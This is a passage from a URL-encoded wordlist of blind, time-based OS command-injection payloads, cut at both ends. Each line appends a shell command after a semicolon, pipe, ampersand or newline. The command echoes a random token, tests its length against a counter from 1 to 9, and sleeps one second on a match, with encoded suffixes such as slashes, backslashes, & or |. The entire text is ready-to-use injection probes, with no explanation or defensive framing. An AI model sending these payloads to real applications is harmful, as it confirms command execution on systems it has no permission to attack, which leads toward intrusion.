B%23str%7D%0A%20if%20%5B%207%20-ne%20%24%7Bstr1%7D%20%5D%0A%20then%20sleep%200%0A%20else%20sleep%201%0A%20fi%20%255C%255C\n%0A%20str%3D%24%28echo%20JTZCSG%29%0A%20str1%3D%24%7B%23str%7D%0A%20if%20%5B%208%20-ne%20%24%7Bstr1%7D%20%5D%0A%20then%20sleep%200%0A%20else%20sleep%201%0A%20fi%20%255C%255C\n%0A%20str%3D%24%28echo%20JTZCSG%29%0A%20str1%3D%24%7B%23str%7D%0A%20if%20%5B%209%20-ne%20%24%7Bstr1%7D%20%5D%0A%20then%20sleep%200%0A%20else%20sleep%201%0A%20fi%20%255C%255C\n%3B%20str%3D%24%28echo%20EEKJDE%29%3B%20str1%3D%24%7B%23str%7D%3B%20if%20%5B%201%20-ne%20%24%7Bstr1%7D%20%5D%3B%20then%20sleep%200%3B%20else%20sleep%201%3B%20fi%20%252F%252F\n%3B%20str%3D%24%28echo%20EEKJDE%29%3B%20str1%3D%24%7B%23str%7D%3B%20if%20%5B%202%20-ne%20%24%7Bstr1%7D%20%5D%3B%20then%20sleep%200%3B%20else%20sleep%201%3B%20fi%20%252F%252F\n%3B%20str%3D%24%28echo%20EEKJDE%29%3B%20str1%3D%24%7B%23str%7D%3B%20if%20%5B%203%20-ne%20%24%7Bstr1%7D%20%5D%3B%20then%20sleep%200%3B%20else%20sleep%201%3B%20fi%20%252F%252F\n%3B%20str%3D%24%28echo%20EEKJDE%29%3B%20str1%3D%24%7B%23str%7D%3B%20if%20%5B%204%20-ne%20%24%7Bstr1%7D%20%5D%3B%20then%20sleep%200%3B%20else%20sleep%201%3B%20fi%20%252F%252F\n%3B%20str%3D%24%28echo%20EEKJDE%29%3B%20str1%3D%24%7B%23str%7D%3B%20if%20%5B%205%20-ne%20%24%7Bstr1%7D%20%5D%3B%20then%20sleep%200%3B%20else%20sleep%201%3B%20fi%20%252F%252F\n%3B%20str%3D%24%28echo%20EEKJDE%29%3B%20str1%3D%24%7B%23str%7D%3B%20if%20%5B%206%20-ne%20%24%7Bstr1%7D%20%5D%3B%20then%20sleep%200%3B%20else%20sleep%201%3B%20fi%20%252F%252F\n%3B%20str%3D%24%28echo%20EEKJDE%29%3B%20str1%3D%24%7B%23str%7D%3B%20if%20%5B%207%20-ne%20%24%7Bstr1%7D%20%5D%3B%20then%20sleep%200%3B%20else%20sleep%201%3B%20fi%20%252F%252F\n%3B%20str%3D%24%28echo%20EEKJDE%29%3B%20str1%3D%24%7B%23str%7D%3B%20if%20%5B%208%20-ne%20%24%7Bstr1%7D%20%5D%3B%20then%20sleep%200%3B%20else%20sleep%201%3B%20fi%20%252F%252F\n%3B%20str%3D%24%28echo%20EEKJDE%29%3B%20str1%3D%24%7B%23str%7D%3B%20if%20%5B%209%20-ne%20%24%7Bstr1%7D%20%5D%3B%20then%20sleep%200%3B%20else%20sleep%201%3B%20fi%20%252F%252F\n%7C%20%5B%201%20-ne%20%24%28echo%20TKXZEX%20%7C%20tr%20-d%20%27%5Cn%27%20%7C%20wc%20-c%29%20%5D%20%7C%7C%20sleep%201%20%252F%252F\n%7C%20%5B%202%20-ne%20%24%28echo%20TKXZEX%20%7C%20tr%20-d%20%27%5Cn%27%20%7C%20wc%20-c%29%20%5D%20%7C%7C%20sleep%201%20%252F%252F\n%7C%20%5B%203%20-ne%20%24%28echo%20TKXZEX%20%7C%20tr%20-d%20%27%5Cn%27%20%7C%20wc%20-c%29%20%5D%20%7C%7C%20sleep%201%20%252F%252F\n%7C%20%5B%204%20-ne%20%24%28echo%20TKXZEX%20%7C%20tr%20-d%20%27%5Cn%27%20%7C%20wc%20-c%29%20%5D%20%7C%7C%20sleep%201%20%252F%252F\n%7C%20%5B%205%20-ne%20%24%28echo%20TKXZEX%20%7C%20tr%20-d%20%27%5Cn%27%20%7C%20wc%20-c%29%20%5D%20%7C%7C%20sleep%201%20%252F%252F\n%7C%20%5B%206%20-ne%20%24%28echo%20TKXZEX%20%7C%20tr%20-d%20%27%5Cn%27%20%7C%20wc%20-c%29%20%5D%20%7C%7C%20sleep%201%20%252F%252F\n%7C%20%5B%207%20-ne%20%24%28echo%20TKXZEX%20%7C%20tr%20-d%20%27%5Cn%27%20%7C%20wc%20-c%29%20%5D%20%7C%7C%20sleep%201%20%252F%252F\n%7C%20%5B%208%20-ne%20%24%28echo%20TKXZEX%20%7C%20tr%20-d%20%27%5Cn%27%20%7C%20wc%20-c%29%20%5D%20%7C%7C%20sleep%201%20%252F%252F\n%7C%20%5B%209%20-ne%20%24%28echo%20TKXZEX%20%7C%20tr%20-d%20%27%5Cn%27%20%7C%20wc%20-c%29%20%5D%20%7C%7C%20sleep%201%20%252F%252F\n%26%20sleep%200%20%26%26%20str%3D%24%28echo%20QELUFF%29%20%26%26%20str1%3D%24%7B%23str%7D%20%26%26%20%5B%201%20-eq%20%24%7Bstr1%7D%20%5D%20%26%26%20sleep%201%20%252F%252F\n%26%20sleep%200%20%26%26%20str%3D%24%28echo%20QELUFF%29%20%26%26%20str1%3D%24%7B%23str%7D%20%26%26%20%5B%202%20-eq%20%24%7Bstr1%7D%20%5D%20%26%26%20sleep%201%20%252F%252F\n%26%20sleep%200%20%26%26%20str%3D%24%28echo%20QELUFF%29%20%26%26%20str1%3D%24%7B%23str%7D%20%26%26%20%5B%203%20-eq%20%24%7Bstr1%7D%20%5D%20%26%26%20sleep%201%20%252F%252F\n%26%20sleep%200%20%26%26%20str%3D%24%28echo%20QELUFF%29%20%26%26%20str1%3D%24%7B%23str%7D%20%26%26%20%5B%204%20-eq%20%24%7Bstr1%7D%20%5D%20%26%26%20sleep%201%20%252F%252F\n%26%20sleep%200%20%26%26%20str%3D%24%28echo%20QELUFF%29%20%26%26%20str1%3D%24%7B%23str%7D%20%26%26%20%5B%205%20-eq%20%24%7Bstr1%7D%20%5D%20%26%26%20sleep%201%20%252F%252F\n%26%20sleep%200%20%26%26%20str%3D%24%28echo%20QELUFF%29%20%26%26%20str1%3D%24%7B%23str%7D%20%26%26%20%5B%206%20-eq%20%24%7Bstr1%7D%20%5D%20%26%26%20sleep%201%20%252F%252F\n%26%20sleep%200%20%26%26%20str%3D%24%28echo%20QELUFF%29%20%26%26%20str1%3D%24%7B%23str%7D%20%26%26%20%5B%207%20-eq%20%24%7Bstr1%7D%20%5D%20%26%26%20sleep%201%20%252F%252F\n%26%20sleep%200%20%26%26%20str%3D%24%28echo%20QELUFF%29%20%26%26%20str1%3D%24%7B%23str%7D%20%26%26%20%5B%208%20-eq%20%24%7Bstr1%7D%20%5D%20%26%26%20sleep%201%20%252F%252F\n%26%20sleep%200%20%26%26%20str%3D%24%28echo%20QELUFF%29%20%26%26%20str1%3D%24%7B%23str%7D%20%26%26%20%5B%209%20-eq%20%24%7Bstr1%7D%20%5D%20%26%26%20sleep%201%20%252F%252F\n%0A%20str%3D%24%28echo%20OKMZVE%29%0A%20str1%3D%24%7B%23str%7D%0A%20if%20%5B%201%20-ne%20%24%7Bstr1%7D%20%5D%0A%20then%20sleep%200%0A%20else%20sleep%201%0A%20fi%20%252F%252F\n%0A%20str%3D%24%28echo%20OKMZVE%29%0A%20str1%3D%24%7B%23str%7D%0A%20if%20%5B%202%20-ne%20%24%7Bstr1%7D%20%5D%0A%20then%20sleep%200%0A%20else%20sleep%201%0A%20fi%20%252F%252F\n%0A%20str%3D%24%28echo%20OKMZVE%29%0A%20str1%3D%24%7B%23str%7D%0A%20if%20%5B%203%20-ne%20%24%7Bstr1%7D%20%5D%0A%20then%20sleep%200%0A%20else%20sleep%201%0A%20fi%20%252F%252F\n%0A%20str%3D%24%28echo%20OKMZVE%29%0A%20str1%3D%24%7B%23str%7D%0A%20if%20%5B%204%20-ne%20%24%7Bstr1%7D%20%5D%0A%20then%20sleep%200%0A%20else%20sleep%201%0A%20fi%20%252F%252F\n%0A%20str%3D%24%28echo%20OKMZVE%29%0A%20str1%3D%24%7B%23str%7D%0A%20if%20%5B%205%20-ne%20%24%7Bstr1%7D%20%5D%0A%20then%20sleep%200%0A%20else%20sleep%201%0A%20fi%20%252F%252F\n%0A%20str%3D%24%28echo%20OKMZVE%29%0A%20str1%3D%24%7B%23str%7D%0A%20if%20%5B%206%20-ne%20%24%7Bstr1%7D%20%5D%0A%20then%20sleep%200%0A%20else%20sleep%201%0A%20fi%20%252F%252F\n%0A%20str%3D%24%28echo%20OKMZVE%29%0A%20str1%3D%24%7B%23str%7D%0A%20if%20%5B%207%20-ne%20%24%7Bstr1%7D%20%5D%0A%20then%20sleep%200%0A%20else%20sleep%201%0A%20fi%20%252F%252F\n%0A%20str%3D%24%28echo%20OKMZVE%29%0A%20str1%3D%24%7B%23str%7D%0A%20if%20%5B%208%20-ne%20%24%7Bstr1%7D%20%5D%0A%20then%20sleep%200%0A%20else%20sleep%201%0A%20fi%20%252F%252F\n%0A%20str%3D%24%28echo%20OKMZVE%29%0A%20str1%3D%24%7B%23str%7D%0A%20if%20%5B%209%20-ne%20%24%7Bstr1%7D%20%5D%0A%20then%20sleep%200%0A%20else%20sleep%201%0A%20fi%20%252F%252F\n%3B%20str%3D%24%28echo%20URVLJV%29%3B%20str1%3D%24%7B%23str%7D%3B%20if%20%5B%201%20-ne%20%24%7Bstr1%7D%20%5D%3B%20then%20sleep%200%3B%20else%20sleep%201%3B%20fi%20%2526\n%3B%20str%3D%24%28echo%20URVLJV%29%3B%20str1%3D%24%7B%23str%7D%3B%20if%20%5B%202%20-ne%20%24%7Bstr1%7D%20%5D%3B%20then%20sleep%200%3B%20else%20sleep%201%3B%20fi%20%2526\n%3B%20str%3D%24%28echo%20URVLJV%29%3B%20str1%3D%24%7B%23str%7D%3B%20if%20%5B%203%20-ne%20%24%7Bstr1%7D%20%5D%3B%20then%20sleep%200%3B%20else%20sleep%201%3B%20fi%20%2526\n%3B%20str%3D%24%28echo%20URVLJV%29%3B%20str1%3D%24%7B%23str%7D%3B%20if%20%5B%204%20-ne%20%24%7Bstr1%7D%20%5D%3B%20then%20sleep%200%3B%20else%20sleep%201%3B%20fi%20%2526\n%3B%20str%3D%24%28echo%20URVLJV%29%3B%20str1%3D%24%7B%23str%7D%3B%20if%20%5B%205%20-ne%20%24%7Bstr1%7D%20%5D%3B%20then%20sleep%200%3B%20else%20sleep%201%3B%20fi%20%2526\n%3B%20str%3D%24%28echo%20URVLJV%29%3B%20str1%3D%24%7B%23str%7D%3B%20if%20%5B%206%20-ne%20%24%7Bstr1%7D%20%5D%3B%20then%20sleep%200%3B%20else%20sleep%201%3B%20fi%20%2526\n%3B%20str%3D%24%28echo%20URVLJV%29%3B%20str1%3D%24%7B%23str%7D%3B%20if%20%5B%207%20-ne%20%24%7Bstr1%7D%20%5D%3B%20then%20sleep%200%3B%20else%20sleep%201%3B%20fi%20%2526\n%3B%20str%3D%24%28echo%20URVLJV%29%3B%20str1%3D%24%7B%23str%7D%3B%20if%20%5B%208%20-ne%20%24%7Bstr1%7D%20%5D%3B%20then%20sleep%200%3B%20else%20sleep%201%3B%20fi%20%2526\n%3B%20str%3D%24%28echo%20URVLJV%29%3B%20str1%3D%24%7B%23str%7D%3B%20if%20%5B%209%20-ne%20%24%7Bstr1%7D%20%5D%3B%20then%20sleep%200%3B%20else%20sleep%201%3B%20fi%20%2526\n%7C%20%5B%201%20-ne%20%24%28echo%20PENGWJ%20%7C%20tr%20-d%20%27%5Cn%27%20%7C%20wc%20-c%29%20%5D%20%7C%7C%20sleep%201%20%2526\n%7C%20%5B%202%20-ne%20%24%28echo%20PENGWJ%20%7C%20tr%20-d%20%27%5Cn%27%20%7C%20wc%20-c%29%20%5D%20%7C%7C%20sleep%201%20%2526\n%7C%20%5B%203%20-ne%20%24%28echo%20PENGWJ%20%7C%20tr%20-d%20%27%5Cn%27%20%7C%20wc%20-c%29%20%5D%20%7C%7C%20sleep%201%20%2526\n%7C%20%5B%204%20-ne%20%24%28echo%20PENGWJ%20%7C%20tr%20-d%20%27%5Cn%27%20%7C%20wc%20-c%29%20%5D%20%7C%7C%20sleep%201%20%2526\n%7C%20%5B%205%20-ne%20%24%28echo%20PENGWJ%20%7C%20tr%20-d%20%27%5Cn%27%20%7C%20wc%20-c%29%20%5D%20%7C%7C%20sleep%201%20%2526\n%7C%20%5B%206%20-ne%20%24%28echo%20PENGWJ%20%7C%20tr%20-d%20%27%5Cn%27%20%7C%20wc%20-c%29%20%5D%20%7C%7C%20sleep%201%20%2526\n%7C%20%5B%207%20-ne%20%24%28echo%20PENGWJ%20%7C%20tr%20-d%20%27%5Cn%27%20%7C%20wc%20-c%29%20%5D%20%7C%7C%20sleep%201%20%2526\n%7C%20%5B%208%20-ne%20%24%28echo%20PENGWJ%20%7C%20tr%20-d%20%27%5Cn%27%20%7C%20wc%20-c%29%20%5D%20%7C%7C%20sleep%201%20%2526\n%7C%20%5B%209%20-ne%20%24%28echo%20PENGWJ%20%7C%20tr%20-d%20%27%5Cn%27%20%7C%20wc%20-c%29%20%5D%20%7C%7C%20sleep%201%20%2526\n%26%20sleep%200%20%26%26%20str%3D%24%28echo%20KIGXDW%29%20%26%26%20str1%3D%24%7B%23str%7D%20%26%26%20%5B%201%20-eq%20%24%7Bstr1%7D%20%5D%20%26%26%20sleep%201%20%2526\n%26%20sleep%200%20%26%26%20str%3D%24%28echo%20KIGXDW%29%20%26%26%20str1%3D%24%7B%23str%7D%20%26%26%20%5B%202%20-eq%20%24%7Bstr1%7D%20%5D%20%26%26%20sleep%201%20%2526\n%26%20sleep%200%20%26%26%20str%3D%24%28echo%20KIGXDW%29%20%26%26%20str1%3D%24%7B%23str%7D%20%26%26%20%5B%203%20-eq%20%24%7Bstr1%7D%20%5D%20%26%26%20sleep%201%20%2526\n%26%20sleep%200%20%26%26%20str%3D%24%28echo%20KIGXDW%29%20%26%26%20str1%3D%24%7B%23str%7D%20%26%26%20%5B%204%20-eq%20%24%7Bstr1%7D%20%5D%20%26%26%20sleep%201%20%2526\n%26%20sleep%200%20%26%26%20str%3D%24%28echo%20KIGXDW%29%20%26%26%20str1%3D%24%7B%23str%7D%20%26%26%20%5B%205%20-eq%20%24%7Bstr1%7D%20%5D%20%26%26%20sleep%201%20%2526\n%26%20sleep%200%20%26%26%20str%3D%24%28echo%20KIGXDW%29%20%26%26%20str1%3D%24%7B%23str%7D%20%26%26%20%5B%206%20-eq%20%24%7Bstr1%7D%20%5D%20%26%26%20sleep%201%20%2526\n%26%20sleep%200%20%26%26%20str%3D%24%28echo%20KIGXDW%29%20%26%26%20str1%3D%24%7B%23str%7D%20%26%26%20%5B%207%20-eq%20%24%7Bstr1%7D%20%5D%20%26%26%20sleep%201%20%2526\n%26%20sleep%200%20%26%26%20str%3D%24%28echo%20KIGXDW%29%20%26%26%20str1%3D%24%7B%23str%7D%20%26%26%20%5B%208%20-eq%20%24%7Bstr1%7D%20%5D%20%26%26%20sleep%201%20%2526\n%26%20sleep%200%20%26%26%20str%3D%24%28echo%20KIGXDW%29%20%26%26%20str1%3D%24%7B%23str%7D%20%26%26%20%5B%209%20-eq%20%24%7Bstr1%7D%20%5D%20%26%26%20sleep%201%20%2526\n%0A%20str%3D%24%28echo%20NIGLJV%29%0A%20str1%3D%24%7B%23str%7D%0A%20if%20%5B%201%20-ne%20%24%7Bstr1%7D%20%5D%0A%20then%20sleep%200%0A%20else%20sleep%201%0A%20fi%20%2526\n%0A%20str%3D%24%28echo%20NIGLJV%29%0A%20str1%3D%24%7B%23str%7D%0A%20if%20%5B%202%20-ne%20%24%7Bstr1%7D%20%5D%0A%20then%20sleep%200%0A%20else%20sleep%201%0A%20fi%20%2526\n%0A%20str%3D%24%28echo%20NIGLJV%29%0A%20str1%3D%24%7B%23str%7D%0A%20if%20%5B%203%20-ne%20%24%7Bstr1%7D%20%5D%0A%20then%20sleep%200%0A%20else%20sleep%201%0A%20fi%20%2526\n%0A%20str%3D%24%28echo%20NIGLJV%29%0A%20str1%3D%24%7B%23str%7D%0A%20if%20%5B%204%20-ne%20%24%7Bstr1%7D%20%5D%0A%20then%20sleep%200%0A%20else%20sleep%201%0A%20fi%20%2526\n%0A%20str%3D%24%28echo%20NIGLJV%29%0A%20str1%3D%24%7B%23str%7D%0A%20if%20%5B%205%20-ne%20%24%7Bstr1%7D%20%5D%0A%20then%20sleep%200%0A%20else%20sleep%201%0A%20fi%20%2526\n%0A%20str%3D%24%28echo%20NIGLJV%29%0A%20str1%3D%24%7B%23str%7D%0A%20if%20%5B%206%20-ne%20%24%7Bstr1%7D%20%5D%0A%20then%20sleep%200%0A%20else%20sleep%201%0A%20fi%20%2526\n%0A%20str%3D%24%28echo%20NIGLJV%29%0A%20str1%3D%24%7B%23str%7D%0A%20if%20%5B%207%20-ne%20%24%7Bstr1%7D%20%5D%0A%20then%20sleep%200%0A%20else%20sleep%201%0A%20fi%20%2526\n%0A%20str%3D%24%28echo%20NIGLJV%29%0A%20str1%3D%24%7B%23str%7D%0A%20if%20%5B%208%20-ne%20%24%7Bstr1%7D%20%5D%0A%20then%20sleep%200%0A%20else%20sleep%201%0A%20fi%20%2526\n%0A%20str%3D%24%28echo%20NIGLJV%29%0A%20str1%3D%24%7B%23str%7D%0A%20if%20%5B%209%20-ne%20%24%7Bstr1%7D%20%5D%0A%20then%20sleep%200%0A%20else%20sleep%201%0A%20fi%20%2526\n%3B%20str%3D%24%28echo%20QIIKMD%29%3B%20str1%3D%24%7B%23str%7D%3B%20if%20%5B%201%20-ne%20%24%7Bstr1%7D%20%5D%3B%20then%20sleep%200%3B%20else%20sleep%201%3B%20fi%20%257C\n%3B%20str%3D%24%28echo%20QIIKMD%29%3B%20str1%3D%24%7B%23str%7D%3B%20if%20%5B%202%20-ne%20%24%7Bstr1%7D%20%5D%3B%20then%20sleep%200%3B%20else%20sleep%201%3B%20fi%20%257C\n%3B%20str%3D%24%28echo%20QIIKMD%29%3B%20str1%3D%24%7B%23str%7D%3B%20if%20%5B%203%20-ne%20%24%7Bstr1%7D%20%5D%3B%20then%20sleep%200%3B%20else%20sleep%201%3B%20fi%20%257C\n%3B%20str%3D%24%28echo%20QIIKMD%29%3B%20str1%3D%24%7B%23str%7D%3B%20if%20%5B%204%20-ne%20%24%7Bstr1%7D%20%5D%3B%20then%20sleep%200%3B%20else%20sleep%201%3B%20fi%20%257C\n%3B%20str%3D%24%28echo%20QIIKMD%29%3B%20str1%3D%24%7B%23str%7D%3B%20if%20%5B%205%20-ne%20%24%7Bstr1%7D%20%5D%3B%20then%20sleep%200%3B%20else%20sleep%201%3B%20fi%20%257C\n%3B%20str%3D%24%28echo%20QIIKMD%29%3B%20str1%3D%24%7B%23str%7D%3B%20if%20%5B%206%20-ne%20%24%7Bstr1%7D%20%5D%3B%20then%20sleep%200%3B%20else%20sleep%201%3B%20fi%20%257C\n%3B%20str%3D%24%28echo%20QIIKMD%29%3B%20str1%3D%24%7B%23str%7D%3B%20if%20%5B%207%20-ne%20%24%7Bstr1%7D%20%5D%3B%20then%20sleep%200%3B%20else%20sleep%201%3B%20fi%20%257C\n%3B%20str%3D%24%28echo%20QIIKMD%29%3B%20str1%3D%24%7B%23str%7D%3B%20if%20%5B%208%20-ne%20%24%7Bstr1%7D%20%5D%3B%20then%20sleep%200%3B%20else%20sleep%201%3B%20fi%20%257C\n%3B%20str%3D%24%28echo%20QIIKMD%29%3B%20str1%3D%24%7B%23str%7D%3B%20if%20%5B%209%20-ne%20%24%7Bstr1%7D%20%5D%3B%20then%20sleep%200%3B%20else%20sleep%201%3B%20fi%20%257C\n%7C%20%5B%201%20-ne%20%24%28echo%20PFMSXE%20%7C%20tr%20-d%20%27%5Cn%27%20%7C%20wc%20-c%29%20%5D%20%7C%7C%20sleep%201%20%257C\n%7C%20%5B%202%20-ne%20%24%28echo%20PFMSXE%20%7C%20tr%20-d%20%27%5Cn%27%20%7C%20wc%20-c%29%20%5D%20%7C%7C%20sleep%201%20%257C\n%7C%20%5B%203%20-ne%20%24%28echo%20PFMSXE%20%7C%20tr%20-d%20%27%5Cn%27%20%7C%20wc%20-c%29%20%5D%20%7C%7C%20sleep%201%20%257C\n%7C%20%5B%204%20-ne%20%24%28echo%20PFMSXE%20%7C%20tr%20-d%20%27%5Cn%27%20%7C%20wc%20-c%29%20%5D%20%7C%7C%20sleep%201%20%257C\n%7C%20%5B%205%20-ne%20%24%28echo%20PFMSXE%20%7C%20tr%20-d%20%27%5Cn%27%20%7C%20wc%20-c%29%20%5D%20%7C%7C%20sleep%201%20%257C\n%7C%20%5B%206%20-ne%20%24%28echo%20PFMSXE%20%7C%20tr%20-d%20%27%5Cn%27%20%7C%20wc%20-c%29%20%5D%20%7C%7C%20sleep%201%20%257C\n%7C%20%5B%207%20-ne%20%24%28echo%20PFMSXE%20%7C%20tr%20-d%20%27%5Cn%27%20%7C%20wc%20-c%29%20%5D%20%7C%7C%20sleep%201%20%257C\n%7C%20%5B%208%20-ne%20%24%28echo%20PFMSXE%20%7C%20tr%20-d%20%27%5Cn%27%20%7C%20wc%20-c%29%20%5D%20%7C%7C%20sleep%201%20%257C\n%7C%20%5B%209%20-ne%20%24%28echo%20PFMSXE%20%7C%20tr%20-d%20%27%5Cn%27%20%7C%20wc%20-c%29%20%5D%20%7C%7C%20sleep%201%20%257C\n%26%20sleep%200%20%26%26%20str%3D%24%28echo%20FAPCEG%29%20%26%26%20str1%3D%24%7B%23str%7D%20%26%26%20%5B%201%20-eq%20%24%7Bstr1%7D%20%5D%20%26%26%20sleep%201%20%257C\n%26%20sleep%200%20%26%26%20str%3D%24%28echo%20FAPCEG%29%20%26%26%20str1%3D%24%7B%23str%7D%20%26%26%20%5B%202%20-eq%20%24%7Bstr1%7D%20%5D%20%26%26%20sleep%201%20%257C\n%26%20sleep%200%20%26%26%20str%3D%24%28echo%20FAPCEG%29%20%26%26%20str1%3D%24%7B%23str%7D%20%26%26%20%5B%203%20-eq%20%24%7Bstr1%7D%20%5D%20%26%26%20sleep%201%20%257C\n%26%20sleep%200%20%26%26%20str%3D%24%28echo%20FAPCEG%29%20%26%26%20str1%3D%24%7B%23str%7D%20%26%26%20%5B%204%20-eq%20%24%7Bstr1%7D%20%5D%20%26%26%20sleep%201%20%257C\n%26%20sleep%200%20%26%26%20str%3D%24%28echo%20FAPCEG%29%20%26%26%20str1%3D%24%7B%23str%7D%20%26%26%20%5B%205%20-eq%20%24%7Bstr1%7D%20%5D%20%26%26%20sleep%201%20%257C\n%26%20sleep%200%20%26%26%20str%3D%24%28echo%20FAPCEG%29%20%26%26%20str1%3D%24%7B%23str%7D%20%26%26%20%5B%206%20-eq%20%24%7Bstr1%7D%20%5D%20%26%26%20sleep%201%20%257C\n%26%20sleep%200%20%26%26%20str%3D%24%28echo%20FAPCEG%29%20%26%26%20str1%3D%24%7B%23str%7D%20%26%26%20%5B%207%20-eq%20%24%7Bstr1%7D%20%5D%20%26%26%20sleep%201%20%257C\n%26%20sleep%200%20%26%26%20str%3D%24%28echo%20FAPCEG%29%20%26%26%20str1%3D%24%7B%23str%7D%20%26%26%20%5B%208%20-eq%20%24%7Bstr1%7D%20%5D%20%26%26%20sleep%201%20%257C\n%26%20sleep%200%20%26%26%20str%3D%24%28echo%20FAPCEG%29%20%26%26%20str1%3D%24%7B%23str%7D%20%26%26%20%5B%209%20-eq%20%24%7Bstr1%7D%20%5D%20%26%26%20sleep%201%20%257C\n%0A%20str%3D%24%28echo%20SRSAFA%29%0A%20str1%3D%24%7B%23str%7D%0A%20if%20%5B%201%20-ne%20%24%7Bstr1%7D%20%5D%0A%20then%20sleep%200%0A%20else%20sleep%201%0A%20fi%20%257C\n%0A%20str%3D%24%28echo%20SRSAFA%29%0A%20str1%3D%24%7B%23str%7D%0A%20if%20%5B%202%20-ne%20%24%7Bstr1%7D%20%5D%0A%20then%20sleep%200%0A%20else%20sleep%201%0A%20fi%20%257C\n%0A%20str%3D%24%28echo%20SRSAFA%29%0A%20str1%3D%24%7B%23str%7D%0A%20if%20%5B%203%20-ne%20%24%7Bstr1%7D%20%5D%0A%20then%20sleep%200%0A%20else%20sleep%201%0A%20fi%20%257C\n%0A%20str%3D%24%28echo%20SRSAFA%29%0A%20str1%3D%24%7B%23str%7D%0A%20if%20%5B%204%20-ne%20%24%7Bstr1%7D%20%5D%0A%20then%20sleep%200%0A%20else%20sleep%201%0A%20fi%20%257C\n%0A%20str%3D%24%28echo%20SRSAFA%29%0A%20str1%3D%24%7B%23str%7D%0A%20if%20%5B%205%20-ne%20%24%7Bstr1%7D%20%5D%0A%20then%20sleep%200%0A%20else%20sleep%201%0A%20fi%20%257C\n%0A%20str%3D%24%28echo%20SRSAFA%29%0A%20str1%3D%24%7B%23str%7D%0A%20if%20%5B%206%20-ne%20%24%7Bstr1%7D%20%5D%0A%20then%20sleep%200%0A%20else%20sleep%201%0A%20fi%20%257C\n%0A%20str%3D%24%28echo%20SRSAFA%29%0A%20str1%3D%24%7B%23str%7D%0A%20if%20%5B%207%20-ne%20%24%7Bstr1%7D%20%5D%0A%20then%20sleep%200%0A%20else%20sleep%201%0A%20fi%20%257C\n%0A%20str%3D%24%28echo%20SRSAFA%29%0A%20str1%3D%24%7B%23str%7D%0A%20if%20%5B%208%20-ne%20%24%7Bstr1%7D%20%5D%0A%20then%20sleep%200%0A%20else%20sleep%201%0A%20fi%20%257C\n%0A%20str%3D%24%28echo%20SRSAFA%29%0A%20str1%3D%24%7B%23str%7D%0A%20if%20%5B%209%20-ne%20%24%7Bstr1%7D%20%5D%0A%20then%20sleep%200%0A%20else%20sleep%201%0A%20fi%20%257C\n%3B%20str%3D%24%28echo%20EPCBGX%29%3B%20str1%3D%24%7B%23str%7D%3B%20if%20%5B%201%20-ne%20%24%7Bstr1%7D%20%5D%3B%20then%20sleep%200%3B%20else%20sleep%201%3B%20fi%20\n%3B%20str%3D%24%28echo%20EPCBGX%29%3B%20str1%3D%24%7B%23str%7D%3B%20if%20%5B%202%20-ne%20%24%7Bstr1%7D%20%5D%3B%20then%20sleep%200%3B%20else%20sleep%201%3B%20fi%20\n%3B%20str%3D%24%28echo%20EPCBGX%29%3B%20str1%3D%24%7B%23str%7D%3B%20if%20%5B%203%20-ne%20%24%7Bstr1%7D%20%5D%3B%20then%20sleep%200%3B%20else%20sleep%201%3B%20fi%20\n%3B%20str%3D%24%28echo%20EPCBGX%29%3B%20str1%3D%24%7B%23str%7D%3B%20if%20%5B%204%20-ne%20%24%7Bstr1%7D%20%5D%3B%20then%20sleep%200%3B%20else%20sleep%201%3B%20fi%20\n%3B%20str%3D%24%28echo%20EPCBGX%29%3B%20str1%3D%24%7B%23str%7D%3B%20if%20%5B%205%20-ne%20%24%7Bstr1%7D%20%5D%3B%20then%20sleep%200%3B%20else%20sleep%201%3B%20fi%20\n%3B%20str%3D%24%28echo%20EPCBGX%29%3B%20str1%3D%24%7B%23str%7D%3B%20if%20%5B%206%20-ne%20%24%7Bstr1%7D%20%5D%3B%20then%20sleep%200%3B%20else%20sleep%201%3B%20fi%20\n%3B%20str%3D%24%28echo%20EPCBGX%29%3B%20str1%3D%24%7B%23str%7D%3B%20if%20%5B%207%20-ne%20%24%7Bstr1%7D%20%5D%3B%20then%20sleep%200%3B%20else%20sleep%201%3B%20fi%20\n%3B%20str%3D%24%28echo%20EPCBGX%29%3B%20str1%3D%24%7B%23str%7D%3B%20if%20%5B%208%20-ne%20%24%7Bstr1%7D%20%5D%3B%20then%20sleep%200%3B%20else%20sleep%201%3B%20fi%20\n%3B%20str%3D%24%28echo%20EPCBGX%29%3B%20str1%3D%24%7B%23str%7D%3B%20if%20%5B%209%20-ne%20%24%7Bstr1%7D%20%5D%3B%20then%20sleep%200%3B%20else%20sleep%201%3B%20fi%20\n%7C%20%5B%201%20-ne%20%24%28echo%20PDVEEQ%20%7C%20tr%20-d%20%27%5Cn%27%20%7C%20wc%20-c%29%20%5D%20%7C%7C%20sleep%201%20\n%7C%20%5B%202%20-ne%20%24%28echo%20PDVEEQ%20%7C%20tr%20-d%20%27%5Cn%27%20%7C%20wc%20-c%29%20%5D%20%7C%7C%20sleep%201%20\n%7C%20%5B%203%20-ne%20%24%28echo%20PDVEEQ%20%7C%20tr%20-d%20%27%5Cn%27%20%7C%20wc%20-c%29%20%5D%20%7C%7C%20sleep%201%20\n%7C%20%5B%204%20-ne%20%24%28echo%20PDVEEQ%20%7C%20tr%20-d%20%27%5Cn%27%20%7C%20wc%20-c%29%20%5D%20%7C%7C%20sleep%201%20\n%7C%20%5B%205%20-ne%20%24%28echo%20PDVEEQ%20%7C%20tr%20-d%20%27%5Cn%27%20%7C%20wc%20-c%29%20%5D%20%7C%7C%20sleep%201%20\n%7C%20%5B%206%20-ne%20%24%28echo%20PDVEEQ%20%7C%20tr%20-d%20%27%5Cn%27%20%7C%20wc%20-c%29%20%5D%20%7C%7C%20sleep%201%20\n%7C%20%5B%207%20-ne%20%24%28echo%20PDVEEQ%20%7C%20tr%20-d%20%27%5Cn%27%20%7C%20wc%20-c%29%20%5D%20%7C%7C%20sleep%201%20\n%7C%20%5B%208%20-ne%20%24%28echo%20PDVEEQ%20%7C%20tr%20-d%20%27%5Cn%27%20%7C%20wc%20-c%29%20%5D%20%7C%7C%20sleep%201%20\n%7C%20%5B%209%20-ne%20%24%28echo%20PDVEEQ%20%7C%20tr%20-d%20%27%5Cn%27%20%7C%20wc%20-c%29%20%5D%20%7C%7C%20sleep%201%20\n%26%20sleep%200%20%26%26%20str%3D%24%28echo%20ERXFFG%29%20%26%26%20str1%3D%24%7B%23str%7D%20%26%26%20%5B%201%20-eq%20%24%7Bstr1%7D%20%5D%20%26%26%20sleep%201%20\n%26%20sleep%200%20%26%26%20str%3D%24%28echo%20ERXFFG%29%20%26%26%20str1%3D%24%7B%23str%7D%20%26%26%20%5B%20